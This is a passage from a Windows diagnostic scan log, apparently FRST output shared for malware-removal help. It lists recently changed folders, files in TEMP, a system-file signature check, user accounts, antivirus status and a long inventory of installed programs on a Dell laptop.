2015-05-27 11:19 - 2012-08-20 14:58 - 00003488 _____ C:\Windows\System32\Tasks\GoogleUpdateTaskUserS-1-5-21-1038277221-3604561771-2240411101-1006Core
2015-05-27 11:17 - 2011-08-16 09:07 - 00000000 ____D C:\ProgramData\Skype
2015-05-25 09:57 - 2012-04-25 08:56 - 00000000 ___RD C:\Program Files (x86)\Skype
2015-05-22 03:05 - 2013-09-22 01:06 - 00000000 ____D C:\Program Files\Microsoft Office 15
2015-05-20 03:01 - 2015-04-05 03:03 - 00000000 ___SD C:\Windows\SysWOW64\GWX
2015-05-20 03:01 - 2015-04-05 03:03 - 00000000 ___SD C:\Windows\system32\GWX
2015-05-14 14:27 - 2014-02-27 02:39 - 00000000 ____D C:\Program Files (x86)\Hearthstone
2015-05-13 19:26 - 2009-07-13 23:20 - 00000000 ____D C:\Windows\rescache
2015-05-13 05:44 - 2012-07-22 15:13 - 00000000 ____D C:\Users\dell 2\AppData\Roaming\Mozilla
2015-05-13 04:58 - 2013-03-13 08:50 - 00000000 ____D C:\Program Files\Microsoft Silverlight
2015-05-13 04:58 - 2013-03-13 08:50 - 00000000 ____D C:\Program Files (x86)\Microsoft Silverlight
2015-05-13 04:53 - 2010-11-21 03:17 - 00000000 ____D C:\Program Files\Windows Journal
2015-05-13 04:53 - 2009-07-13 23:20 - 00000000 ____D C:\Windows\system32\AdvancedInstallers
2015-05-13 04:50 - 2015-04-19 20:23 - 00000000 ____D C:\ProgramData\Origin
2015-05-13 03:35 - 2012-01-24 18:15 - 00000000 ____D C:\Program Files (x86)\Microsoft Application Virtualization Client
2015-05-13 03:25 - 2013-08-13 17:25 - 00000000 ____D C:\Windows\system32\MRT
2015-05-13 03:04 - 2013-03-13 08:51 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Silverlight
 
==================== Files in the root of some directories =======
 
2015-06-07 03:52 - 2015-06-07 04:23 - 6103040 _____ () C:\Program Files (x86)\GUT9627.tmp
2012-08-30 13:20 - 2013-08-14 22:55 - 0000600 _____ () C:\Users\dell 2\AppData\Local\PUTTY.RND
2012-09-05 07:51 - 2013-03-18 14:38 - 0007610 _____ () C:\Users\dell 2\AppData\Local\Resmon.ResmonCfg
 
Some files in TEMP:
====================
C:\Users\dell 2\AppData\Local\Temp\Quarantine.exe
C:\Users\dell 2\AppData\Local\Temp\sqlite3.dll
 
 
==================== Bamital & volsnap Check =================
 
(There is no automatic fix for files that do not pass verification.)
 
C:\Windows\System32\winlogon.exe => File is digitally signed
C:\Windows\System32\wininit.exe => File is digitally signed
C:\Windows\SysWOW64\wininit.exe => File is digitally signed
C:\Windows\explorer.exe => File is digitally signed
C:\Windows\SysWOW64\explorer.exe => File is digitally signed
C:\Windows\System32\svchost.exe => File is digitally signed
C:\Windows\SysWOW64\svchost.exe => File is digitally signed
C:\Windows\System32\services.exe => File is digitally signed
C:\Windows\System32\User32.dll => File is digitally signed
C:\Windows\SysWOW64\User32.dll => File is digitally signed
C:\Windows\System32\userinit.exe => File is digitally signed
C:\Windows\SysWOW64\userinit.exe => File is digitally signed
C:\Windows\System32\rpcss.dll => File is digitally signed
C:\Windows\System32\Drivers\volsnap.sys => File is digitally signed
 
 
LastRegBack: 2015-01-14 05:18
 
==================== End of log ============================
 
Additional scan result of Farbar Recovery Scan Tool (x64) Version:07-06-2015
Ran by dell 2 at 2015-06-08 12:58:02
Running from C:\Users\dell 2\Downloads
Boot Mode: Normal
==========================================================
 
 
==================== Accounts: =============================
 
Administrator (S-1-5-21-1038277221-3604561771-2240411101-500 - Administrator - Disabled)
dell 2 (S-1-5-21-1038277221-3604561771-2240411101-1006 - Administrator - Enabled) => C:\Users\dell 2
Guest (S-1-5-21-1038277221-3604561771-2240411101-501 - Limited - Disabled)
HomeGroupUser$ (S-1-5-21-1038277221-3604561771-2240411101-1002 - Limited - Enabled)
 
==================== Security Center ========================
 
(If an entry is included in the fixlist, it will be removed.)
 
AV: Norton Security Suite (Disabled - Up to date) {53C7D717-52E2-B95E-FA61-6F32ECC805DB}
AV: Norton Security Suite (Disabled - Up to date) {D87FA2C0-F526-77B1-D6EC-0EDF3936CEDB}
AS: Norton Security Suite (Disabled - Up to date) {631E4324-D31C-783F-EC5C-35AD42B18466}
AS: Trend Micro Client/Server Security Agent Anti-spyware (Disabled - Up to date) {D3988948-0C9A-0693-BE3C-BB4CF86413BF}
AS: Windows Defender (Disabled - Out of date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AS: Norton Security Suite (Enabled - Up to date) {E8A636F3-74D8-B6D0-C0D1-5440974F4F66}
FW: Norton Security Suite (Disabled) {E04423E5-BF49-76E9-FDB3-A7EAC7E589A0}
FW: Norton Security Suite (Disabled) {6BFC5632-188D-B806-D13E-C607121B42A0}
 
==================== Installed Programs ======================
 
(Only the adware programs with "hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)
 
7-Zip 9.20 (x64 edition) (HKLM\...\{23170F69-40C1-2702-0920-000001000000}) (Version: 9.20.00.0 - Igor Pavlov)
AccelerometerP11 (HKLM-x32\...\{87434D51-51DB-4109-B68F-A829ECDCF380}) (Version: 2.00.10.22 - STMicroelectronics)
Adobe AIR (HKLM-x32\...\Adobe AIR) (Version: 3.1.0.4880 - Adobe Systems Incorporated)
Adobe Flash Player 17 ActiveX (HKLM-x32\...\Adobe Flash Player ActiveX) (Version: 17.0.0.188 - Adobe Systems Incorporated)
Adobe Flash Player 17 NPAPI (HKLM-x32\...\Adobe Flash Player NPAPI) (Version: 17.0.0.169 - Adobe Systems Incorporated)
Adobe Help Manager (HKLM-x32\...\chc.4875E02D9FB21EE389F73B8D1702B320485DF8CE.1) (Version: 4.0.244 - Adobe Systems Incorporated)
Adobe InDesign CS6 (HKLM-x32\...\{CFB770D7-8D43-1014-922B-CC2715FADE3F}) (Version: 8.0 - Adobe Systems Incorporated)
Adobe Photoshop CS6 (HKLM-x32\...\{74EB3499-8B95-4B5C-96EB-7B342F3FD0C6}) (Version: 13.0 - Adobe Systems Incorporated)
Adobe Reader X (10.1.6) (HKLM-x32\...\{AC76BA86-7AD7-1033-7B44-AA1000000001}) (Version: 10.1.6 - Adobe Systems Incorporated)
Adobe Shockwave Player 11.6 (HKLM-x32\...\Adobe Shockwave Player) (Version: 11.6.8.638 - Adobe Systems, Inc.)
Age of Empires II: HD Edition (HKLM-x32\...\Steam App 221380) (Version:  - Hidden Path Entertainment, Ensemble Studios)
Apple Application Support (HKLM-x32\...\{EB879750-CCBD-4013-BFD5-0294D4DA5BD0}) (Version: 2.1.7 - Apple Inc.)
Apple Software Update (HKLM-x32\...\{789A5B64-9DD9-4BA5-915A-F0FC0A1B7BFE}) (Version: 2.1.3.127 - Apple Inc.)
AuthenTec Fingerprint Software (Version: 8.4.4.20 - AuthenTec, Inc.) Hidden
Battle.net (HKLM-x32\...\Battle.net) (Version:  - Blizzard Entertainment)
BioAPI Framework (Version: 1.0.2 - Dell Inc.) Hidden
Broadcom NetXtreme-I Netlink Driver and Management Installer (HKLM\...\{64973F6A-8754-43D1-BDD0-FC6F0546347B}) (Version: 14.4.6.2 - Broadcom Corporation)
Cisco WebEx Meetings (HKLM-x32\...\ActiveTouchMeetingClient) (Version:  - Cisco WebEx LLC)
Custom (Version: 01.00.00.000 - Wave Systems Corp.) Hidden
CyberLink PowerDVD 9.5 (HKLM-x32\...\InstallShield_{A8516AC9-AAF1-47F9-9766-03E2D4CDBCF8}) (Version: 9.5.1.3225 - CyberLink Corp.)
D3DX10 (x32 Version: 15.4.2368.0902 - Microsoft) Hidden
Dell Backup and Recovery Manager (HKLM\...\{50B4B603-A4C6-4739-AE96-6C76A0F8A388}) (Version: 1.3.1 - Dell Inc.)
Dell Data Protection | Access (HKLM-x32\...\{A7D91856-258D-4C87-8041-B170851CE432}) (Version: 2.0.00001.001 - Dell Inc.)
Dell Data Protection | Access (Version: 01.01.01.001 - Wave Systems Corp) Hidden
Dell Data Protection | Access | Drivers (HKLM-x32\...\{4E4E65EE-C456-45AC-B5AD-C62C3A325BD0}) (Version: 1.00.011 - Dell Inc.)
Dell Data Protection | Access | Middleware (HKLM-x32\...\{841CBDD5-4BB5-403E-AEE3-2FADC3890BE8}) (Version: 1.00.005 - Dell Inc.)
Dell Edoc Viewer (HKLM\...\{8EBA8727-ADC2-477B-9D9A-1A1836BE4E05}) (Version: 1.0.0 - Dell Inc)
Dell System Detect (HKU\S-1-5-21-1038277221-3604561771-2240411101-1006\...\9204f5692a8faf3b) (Version: 5.7.0.6 - Dell)
Dell System Manager (HKLM\...\{FDF509ED-9624-4FDE-9BAA-9566C186AB96}) (Version: 1.6.00000 - Dell Inc.)
Dell Touchpad (HKLM\...\{9F72EF8B-AEC9-4CA5-B483-143980AFD6FD}) (Version: 7.1208.101.116 - ALPS ELECTRIC CO., LTD.)
Dell Webcam Central (HKLM-x32\...\Dell Webcam Central) (Version: 1.40.28 - Creative Technology Ltd)
DellAccess (Version: 01.01.00.053 - Wave Systems Corp.) Hidden
Digital Line Detect (HKLM-x32\...\{E646DCF0-5A68-11D5-B229-002078017FBF}) (Version: 1.21 - BVRP Software, Inc)
DirectX 9 Runtime (x32 Version: 1.00.0000 - Sonic Solutions) Hidden
EMBASSY Security Center (Version: 04.03.00.067 - Wave Systems Corp.) Hidden
EPSON Printer Software (HKLM\...\EPSON Printer and Utilities) (Version:  - )
FileZilla Client 3.6.0.2 (HKLM-x32\...\FileZilla Client) (Version: 3.6.0.2 - FileZilla Project)
FileZilla Server (HKLM-x32\...\FileZilla Server) (Version: beta 0.9.39 - FileZilla Project)
Fraps (remove only) (HKLM-x32\...\Fraps) (Version:  - )
Gemalto (Version: 01.64.01.0010 - Wave Systems Corp) Hidden
Glyph (HKLM-x32\...\Glyph) (Version:  - Trion Worlds, Inc.)
Google Chrome (HKLM-x32\...\Google Chrome) (Version: 43.0.2357.81 - Google Inc.)
Google Drive (HKLM-x32\...\{35574F09-89F9-4B16-B69B-64F3E25901B8}) (Version: 1.21.9226.6034 - Google, Inc.)
Google Talk Plugin (HKLM-x32\...\{3F15E203-BC3E-3597-84CD-EDF99546C917}) (Version: 3.2.4.8431 - Google)
Google Talk Plugin (HKLM-x32\...\{CA3DD97D-1FD7-37A7-BD5C-FC4430C8B8E6}) (Version: 5.41.2.0 - Google)
Google Update Helper (x32 Version: 1.3.25.11 - Google Inc.) Hidden
Google Update Helper (x32 Version: 1.3.27.5 - Google Inc.) Hidden
GoToMeeting 5.4.0.1082 (HKU\S-1-5-21-1038277221-3604561771-2240411101-1006\...\GoToMeeting) (Version: 5.4.0.1082 - CitrixOnline)
Hearthstone (HKLM-x32\...\Hearthstone) (Version:  - Blizzard Entertainment)
Heroes of the Storm (HKLM-x32\...\Heroes of the Storm) (Version:  - Blizzard Entertainment)
HitmanPro 3.7 (HKLM\...\HitmanPro37) (Version: 3.7.9.241 - SurfRight B.V.)
Intel® Identity Protection Technology 1.0.71.0 (HKLM-x32\...\{2C43790E-8470-1027-82D3-DF319F3C410F}) (Version: 1.0.71.0 - Intel Corporation)
Intel® Management Engine Components (HKLM-x32\...\{65153EA5-8B6E-43B6-857B-C6E4FC25798A}) (Version: 7.0.0.1144 - Intel Corporation)
Intel® Processor Graphics (HKLM-x32\...\{F0E3AD40-2BBD-4360-9C76-B9AC9A5886EA}) (Version: 9.17.10.4101 - Intel Corporation)
Intel® PROSet/Wireless WiFi Software (HKLM\...\{4C1CCA11-0D08-4D5E-8444-2D9FB48BCABF}) (Version: 14.00.20110 - Intel Corporation)
Intel® SDK for OpenCL - CPU Only Runtime Package (HKLM-x32\...\{FCB3772C-B7D0-4933-B1A9-3707EBACC573}) (Version: 2.0.0.37149 - Intel Corporation)
Java 8 Update 45 (HKLM-x32\...\{26A24AE4-039D-4CA4-87B4-2F83218045F0}) (Version: 8.0.450 - Oracle Corporation)
join.me (HKU\S-1-5-21-1038277221-3604561771-2240411101-1006\...\JoinMe) (Version: 1.7.0.138 - LogMeIn, Inc.)
Juniper Networks Network Connect 7.4.0 (HKLM-x32\...\Juniper Network Connect 7.4.0) (Version: 7.4.0.27757 - Juniper Networks)
Juniper Networks, Inc. Setup Client (HKU\S-1-5-21-1038277221-3604561771-2240411101-1006\...\Juniper_Setup_Client) (Version: 7.4.6.40675 - Juniper Networks, Inc.)
Juniper Networks, Inc. Setup Client 64-bit Activex Control (HKLM\...\Juniper_Setup_Client Activex Control) (Version: 2.1.1.1 - Juniper Networks, Inc.)
Junk Mail filter update (x32 Version: 15.4.3502.0922 - Microsoft Corporation) Hidden
Malwarebytes Anti-Exploit version 1.06.1.1019 (HKLM\...\Malwarebytes Anti-Exploit_is1) (Version: 1.06.1.1019 - Malwarebytes)
Malwarebytes Anti-Malware version 2.1.6.1022 (HKLM-x32\...\Malwarebytes Anti-Malware_is1) (Version: 2.1.6.1022 - Malwarebytes Corporation)
McAfee Security Scan Plus (HKLM\...\McAfee Security Scan) (Version: 3.8.130.10 - McAfee, Inc.)
Medieval II: Total War (HKLM-x32\...\Steam App 4700) (Version:  - The Creative Assembly)
Mesh Runtime (x32 Version: 15.4.5722.2 - Microsoft Corporation) Hidden
Microsoft .NET Framework 4 Multi-Targeting Pack (HKLM-x32\...\{CFEF48A8-BFB8-3EAC-8BA5-DE4F8AA267CE}) (Version: 4.0.30319 - Microsoft Corporation)
Microsoft .NET Framework 4.5.2 (HKLM\...\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1033) (Version: 4.5.51209 - Microsoft Corporation)
Microsoft Help Viewer 1.1 (HKLM\...\Microsoft Help Viewer 1.1) (Version: 1.1.40219 - Microsoft Corporation)
Microsoft Mouse and Keyboard Center (HKLM\...\Microsoft Mouse and Keyboard Center) (Version: 2.2.173.0 - Microsoft Corporation)
Microsoft Office 365 - en-us (HKLM\...\O365HomePremRetail - en-us) (Version: 15.0.4719.1002 - Microsoft Corporation)
Microsoft Office Click-to-Run 2010 (HKLM-x32\...\Office14.Click2Run) (Version: 14.0.4763.1000 - Microsoft Corporation)
Microsoft Office Starter 2010 - English (HKLM-x32\...\{90140011-0066-0409-0000-0000000FF1CE}) (Version: 14.0.4763.1000 - Microsoft Corporation)
Microsoft Report Viewer 2012 Runtime (HKLM-x32\...\{9CCE40CE-A9E6-4916-8729-B008558EEF3F}) (Version: 11.0.2100.60 - Microsoft Corporation)
Microsoft Silverlight (HKLM\...\{89F4137D-6C26-4A84-BDB8-2E5A4BB71E00}) (Version: 5.1.40416.0 - Microsoft Corporation)
Microsoft SkyDrive (HKU\S-1-5-21-1038277221-3604561771-2240411101-1006\...\SkyDriveSetup.exe) (Version: 17.0.2003.1112 - Microsoft Corporation)
Microsoft SQL Server 2005 Compact Edition [ENU] (HKLM-x32\...\{F0B430D1-B6AA-473D-9B06-AA3DD01FD0B8}) (Version: 3.1.0000 - Microsoft Corporation)
Microsoft SQL Server 2008 R2 Management Objects (HKLM-x32\...\{83F2B8F4-5CF3-4BE9-9772-9543EAE4AC5F}) (Version: 10.51.2500.0 - Microsoft Corporation)
Microsoft SQL Server 2008 Setup Support Files  (HKLM\...\{B40EE88B-400A-4266-A17B-E3DE64E94431}) (Version: 10.1.2731.0 - Microsoft Corporation)
Microsoft SQL Server 2012 (64-bit) (HKLM\...\Microsoft SQL Server SQLServer2012) (Version:  - Microsoft Corporation)
Microsoft SQL Server 2012 Native Client  (HKLM\...\{49D665A2-4C2A-476E-9AB8-FCC425F526FC}) (Version: 11.0.2100.60 - Microsoft Corporation)
Microsoft SQL Server 2012 Setup (English) (HKLM\...\{AB4AE7E5-E63E-458E-A9D9-B271EA2ED69B}) (Version: 11.1.3000.0 - Microsoft Corporation)
Microsoft SQL Server 2012 Transact-SQL Compiler Service  (HKLM\...\{BEB0F91E-F2EA-48A1-B938-7857ABF2A93D}) (Version: 11.0.2100.60 - Microsoft Corporation)
Microsoft SQL Server 2012 Transact-SQL ScriptDom  (HKLM\...\{0E8670B8-3965-4930-ADA6-570348B67153}) (Version: 11.0.2100.60 - Microsoft Corporation)
Microsoft SQL Server System CLR Types (HKLM-x32\...\{C3F6F200-6D7B-4879-B9EE-700C0CE1FCDA}) (Version: 10.51.2500.0 - Microsoft Corporation)
Microsoft System CLR Types for SQL Server 2012 (x64) (HKLM\...\{F1949145-EB64-4DE7-9D81-E6D27937146C}) (Version: 11.0.2100.60 - Microsoft Corporation)
Microsoft Visual C++ 2005 ATL Update kb973923 - x86 8.0.50727.4053 (HKLM-x32\...\{770657D0-A123-3C07-8E44-1C83EC895118}) (Version: 8.0.50727.4053 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{7299052b-02a4-4627-81f2-1818da5d550d}) (Version: 8.0.56336 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{837b34e3-7c30-493c-8f6a-2b0f04e2912c}) (Version: 8.0.59193 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{6ce5bae9-d3ca-4b99-891a-1dc6c118a5fc}) (Version: 8.0.59192 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{ad8a2fa1-06e7-4b0d-927d-6e54b3d31028}) (Version: 8.0.61000 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.21022 (HKLM\...\{350AA351-21FA-3270-8B7A-835434E766AD}) (Version: 9.0.21022 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.17 (HKLM\...\{8220EEFE-38CD-377E-8595-13398D740ACE}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.4148 (HKLM\...\{4B6C7001-C7D6-3710-913E-5BC23FCE91E6}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 (HKLM\...\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.21022 (HKLM-x32\...\{FF66E9F6-83E7-3A3E-AF14-8DE9A809A6A4}) (Version: 9.0.21022 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148 (HKLM-x32\...\{1F1C2DFC-2D24-3E06-BCB8-725134ADF989}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2010  x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010  x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010  x86 Runtime - 10.0.40219 (HKLM-x32\...\{5D9ED403-94DE-3BA0-B1D6-71F4BDA412E6}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 (HKLM-x32\...\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 (HKLM-x32\...\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual Studio 2010 Shell (Isolated) - ENU (HKLM-x32\...\{D64B6984-242F-32BC-B008-752806E5FC44}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual Studio 2010 Tools for Office Runtime (x64) (HKLM\...\Microsoft Visual Studio 2010 Tools for Office Runtime (x64)) (Version: 10.0.50903 - Microsoft Corporation)
Microsoft VSS Writer for SQL Server 2012 (HKLM\...\{3E0DD83F-BE4C-4478-86A0-AD0D79D1353E}) (Version: 11.0.2100.60 - Microsoft Corporation)
Modem Diagnostic Tool (HKLM\...\{0335701D-8E28-4A7F-B0EF-312974755BB2}) (Version: 1.0.28.0 - Dell)
Mozilla Firefox 29.0.1 (x86 en-US) (HKLM-x32\...\Mozilla Firefox 29.0.1 (x86 en-US)) (Version: 29.0.1 - Mozilla)
Mozilla Maintenance Service (HKLM-x32\...\MozillaMaintenanceService) (Version: 29.0.1 - Mozilla)
Mozilla Thunderbird 17.0 (x86 en-US) (HKLM-x32\...\Mozilla Thunderbird 17.0 (x86 en-US)) (Version: 17.0 - Mozilla)
MSXML 4.0 SP2 (KB954430) (HKLM-x32\...\{86493ADD-824D-4B8E-BD72-8C5DCDC52A71}) (Version: 4.20.9870.0 - Microsoft Corporation)
MSXML 4.0 SP2 (KB973688) (HKLM-x32\...\{F662A8E6-F4DC-41A2-901E-8C11F044BDEC}) (Version: 4.20.9876.0 - Microsoft Corporation)
Netwaiting (HKLM-x32\...\{3F92ABBB-6BBF-11D5-B229-002078017FBF}) (Version: 2.5.59 - BVRP Software, Inc)
Norton Security Suite (HKLM-x32\...\N360) (Version: 21.7.0.11 - Symantec Corporation)
Notepad++ (HKLM-x32\...\Notepad++) (Version: 5.9.3 - )
NTRU TCG Software Stack (Version: 2.1.34 - Security Innovation) Hidden
O2Micro Flash Memory Card Windows Driver (HKLM-x32\...\InstallShield_{938A412F-78C1-4158-8590-038A1D670A57}) (Version: 3.0.07.47 - O2Micro International LTD.)
O2Micro Flash Memory Card Windows Driver (x32 Version: 3.0.07.47 - O2Micro International LTD.) Hidden
O2Micro OZ776 SCR Driver (HKLM-x32\...\InstallShield_{732D0C79-C6E3-4EDE-8D11-67D58697E0DE}) (Version: 2.1.4.210GS - O2Micro)
O2Micro OZ776 SCR Driver (Version: 2.1.4.210GS - O2Micro) Hidden
Office 15 Click-to-Run Extensibility Component (x32 Version: 15.0.4719.1002 - Microsoft Corporation) Hidden
Office 15 Click-to-Run Licensing Component (Version: 15.0.4719.1002 - Microsoft Corporation) Hidden
Office 15 Click-to-Run Localization Component (x32 Version: 15.0.4719.1002 - Microsoft Corporation) Hidden
OpenOffice.org 3.3 (HKLM-x32\...\{3E171899-0175-47CC-84C4-562ACDD4C021}) (Version: 3.3.9567 - OpenOffice.org)
Opera Mobile (HKLM-x32\...\{FA55C144-16EC-4C19-ABFF-2E172C26950D}_is1) (Version:  - Opera Software ASA)
Origin (HKLM-x32\...\Origin) (Version: 9.5.12.2862 - Electronic Arts, Inc.)
PC-CCID (Version: 2.0.0 - Gemalto) Hidden
PDF Settings CS6 (x32 Version: 11.0 - Adobe Systems Incorporated) Hidden
Pegasus Mail (HKLM-x32\...\Pegasus Mail) (Version:  - David Harris)
Pegasus Mail HTML Renderer 2.4.7.2 (HKLM-x32\...\{A9F5E1E1-1281-4862-90B4-6CF8E6AF83CE}_is1) (Version:  - Micha's Midnight Manufacture)
PhotoShowExpress (x32 Version: 2.0.063 - Sonic Solutions) Hidden
PowerISO (HKLM-x32\...\PowerISO) (Version: 6.2 - Power Software Ltd)
Preboot Manager (Version: 03.03.00.049 - Wave Systems Corp.) Hidden
PremiumSoft Navicat Lite 9.0 (HKLM-x32\...\PremiumSoft Navicat Lite_is1) (Version:  - PremiumSoft CyberTech Ltd.)
Private Information Manager (Version: 07.01.00.007 - Wave Systems Corp.) Hidden
QuickTime (HKLM-x32\...\{0E64B098-8018-4256-BA23-C316A43AD9B0}) (Version: 7.72.80.56 - Apple Inc.)
RaidCall (HKLM-x32\...\RaidCall) (Version: 7.3.6-1.0.12972.94 - raidcall.com)
RBVirtualFolder64Inst (Version: 1.00.0000 - Roxio, Inc.) Hidden
Roxio Creator Starter (HKLM-x32\...\{6F0BBEFE-BE1C-419B-BA1F-D36C9E7915BC}) (Version: 12.1.77.0 - Roxio)
Roxio File Backup (Version: 1.3.2 - Roxio) Hidden
Safari (HKLM-x32\...\{C779648B-410E-4BBA-B75B-5815BCEFE71D}) (Version: 5.34.57.2 - Apple Inc.)
Sid Meier's Civilization V (HKLM-x32\...\Steam App 8930) (Version:  - 2K Games, Inc.)
Skype Click to Call (HKLM-x32\...\{6D1221A9-17BF-4EC0-81F2-27D30EC30701}) (Version: 7.4.0.9058 - Microsoft Corporation)
Skype™ 7.4 (HKLM-x32\...\{24991BA0-F0EE-44AD-9CC8-5EC50AECF6B7}) (Version: 7.4.102 - Skype Technologies S.A.)
Sonic CinePlayer Decoder Pack (x32 Version: 4.3.0 - Sonic Solutions) Hidden
Sophos Virus Removal Tool (HKLM-x32\...\{B829E117-D072-41EA-9606-9826A38D34C1}) (Version: 2.1 - Sophos Limited)
SPBA 5.9 (Version: 5.9.4.6686 - UPEK Inc.) Hidden
SQL Server 2012 Common Files (Version: 11.0.2100.60 - Microsoft Corporation) Hidden
SQL Server 2012 Database Engine Services (Version: 11.0.2100.60 - Microsoft Corporation) Hidden
SQL Server 2012 Database Engine Shared (Version: 11.0.2100.60 - Microsoft Corporation) Hidden
SQL Server 2012 Management Studio (Version: 11.0.2100.60 - Microsoft Corporation) Hidden
SQL Server Browser for SQL Server 2012 (HKLM-x32\...\{4B9E6EB0-0EED-4E74-9479-F982C3254F71}) (Version: 11.0.2100.60 - Microsoft Corporation)
Sql Server Customer Experience Improvement Program (Version: 11.0.2100.60 - Microsoft Corporation) Hidden
Steam (HKLM-x32\...\{048298C9-A4D3-490B-9FF9-AB023A9238F3}) (Version: 1.0.0.0 - Valve Corporation)
swMSM (x32 Version: 12.0.0.1 - Adobe Systems, Inc) Hidden
TaxACT 2010 (HKLM-x32\...\TaxACT 2010) (Version:  - 2nd Story Software, Inc.)
TaxACT 2010 Michigan (HKLM-x32\...\TaxACT 2010 Michigan) (Version:  - 2nd Story Software, Inc.)
TaxACT 2011 - 1040 Edition (HKLM-x32\...\TaxACT 2011 - 1040 Edition) (Version:  - 2nd Story Software, Inc.)
TeamSpeak 3 Client (HKLM-x32\...\TeamSpeak 3 Client) (Version: 3.0.14 - TeamSpeak Systems GmbH)
TeamViewer 8 (HKLM-x32\...\TeamViewer 8) (Version: 8.0.30992 - TeamViewer)
Trend Micro Client/Server Security Agent (HKLM-x32\...\{BED0B8A2-2986-49F8-90D6-FA008D37A3D2}) (Version: 3.0.3152 - Trend Micro)
Trusted Drive Manager (Version: 4.0.5.8 - Wave Systems Corp.) Hidden
Tweaking.com - Windows Repair (HKLM-x32\...\Tweaking.com - Windows Repair) (Version: 3.2.1 - Tweaking.com)
Upek Touchchip Fingerprint Reader (Version: 1.2.004 - Dell Inc.) Hidden
Ventrilo Client (HKLM-x32\...\{789289CA-F73A-4A16-A331-54D498CE069F}) (Version: 3.0.8 - Flagship Industries, Inc.)
Visual Studio 2010 Prerequisites - English (HKLM\...\{662014D2-0450-37ED-ABAE-157C88127BEB}) (Version: 10.0.40219 - Microsoft Corporation)
VmciSockets (Version: 9.1.54.1 - VMware, Inc.) Hidden
VMware Player (HKLM-x32\...\VMware_Player) (Version: 4.0.4.30409 - VMware, Inc)
VMware Player (x32 Version: 4.0.4.30409 - VMware, Inc.) Hidden
Wave Infrastructure Installer (Version: 07.66.40.0008 - Wave Systems Corp) Hidden
Wave Support Software Installer (Version: 05.13.00.014 - Wave Systems Corp) Hidden
WIDCOMM Bluetooth Software (HKLM\...\{436E0B79-2CFB-4E5F-9380-E17C1B25D0C5}) (Version: 6.3.0.7900 - Broadcom Corporation)
Widevine Media Optimizer IE 6.0.0 (HKU\S-1-5-21-1038277221-3604561771-2240411101-1006\...\optimizer_ie) (Version: 6.0.0.12757 - Widevine Technologies)
Windows Driver Package - Dell Inc. PBADRV System  (09/11/2009 1.0.1.6) (HKLM\...\9512AA21B791B05A54E27065C45BBC417AB282DF) (Version: 09/11/2009 1.0.1.6 - Dell Inc.)
Windows Live Essentials (HKLM-x32\...\WinLiveSuite) (Version: 15.4.3508.1109 - Microsoft Corporation)
Windows Live Mesh ActiveX Control for Remote Connections (HKLM-x32\...\{2902F983-B4C1-44BA-B85D-5C6D52E2C441}) (Version: 15.4.5722.2 - Microsoft Corporation)
WinRAR 5.21 (64-bit) (HKLM\...\WinRAR archiver) (Version: 5.21.0 - win.rar GmbH)
WinZip 19.5 (HKLM\...\{CD95F661-A5C4-44F5-A6AA-ECDD91C240E9}) (Version: 19.5.11475 - WinZip Computing, S.L. )
World of Warcraft (HKLM-x32\...\World of Warcraft) (Version:  - Blizzard Entertainment)
Yahoo! Detect (HKLM-x32\...\YTdetect) (Version:  - )
 
==================== Custom CLSID (Whitelisted): ==========================
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
CustomCLSID: HKU\S-1-5-21-1038277221-3604561771-2240411101-1006_Classes\CLSID\{005A3A96-BAC4-4B0A-94EA-C0CE100EA736}\localserver32 -> C:\Users\dell 2\AppData\Roaming\Dropbox\bin\Dropbox.exe /autoplay No File
CustomCLSID: HKU\S-1-5-21-1038277221-3604561771-2240411101-1006_Classes\CLSID\{0F22A205-CFB0-4679-8499-A6F44A80A208}\InprocServer32 -> C:\Users\dell 2\AppData\Local\Google\Update\1.3.25.5\psuser_64.dll No File
